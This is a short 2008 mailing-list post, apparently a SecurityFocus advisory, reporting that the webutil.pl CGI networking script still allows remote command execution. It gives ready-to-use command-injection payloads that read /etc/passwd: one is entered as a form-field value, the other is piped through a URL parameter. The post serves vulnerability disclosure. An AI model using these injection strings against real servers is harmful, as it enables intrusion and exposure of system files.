webutil.pl is still vulnerable against Remote Command Execution. Mar 21 2008 05:08PM
zero-x linuxmail org
Webutil is a collection of networking tools by "The Puppet Master".

Access the following url and type in the form field "$(cat$IFS/etc/passwd)":

http://server/cgi-bin/webutil.pl?dig

http://server/cgi-bin/webutil.pl?whois (Version 2.3 only)

Type in the following url (Version 2.7 only):

http://server/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd

<< Greetz Zero X >>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus